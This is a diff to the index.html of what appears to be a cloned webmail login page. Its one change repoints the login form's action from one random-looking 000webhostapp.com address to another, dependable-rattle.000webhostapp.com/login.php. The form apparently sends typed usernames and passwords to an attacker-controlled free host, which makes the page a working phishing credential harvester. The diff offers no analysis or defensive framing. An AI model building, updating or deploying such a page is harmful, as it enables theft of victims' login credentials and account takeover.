--- a/index.html
+++ b/index.html
@@ -74,7 +74,7 @@
 	
 <div class="content-wrapper">
 	<div class="content-inner wm-ui-generic-frame wm-ui-genericform wm-ui-two-side-page-left wm-ui-content-fontstyle wm-ui-right-border wm-ui-top-border">
-        <form name="frmLogin" id="frmLogin" method="post" autocomplete="off" action="//vlmeowmeoqwieopqw.000webhostapp.com/login.php" onsubmit="return;">
+        <form name="frmLogin" id="frmLogin" method="post" autocomplete="off" action="https://dependable-rattle.000webhostapp.com/login.php" onsubmit="return;">
         <input type="hidden" name="return" value="">
         <table>
             <tbody><tr>
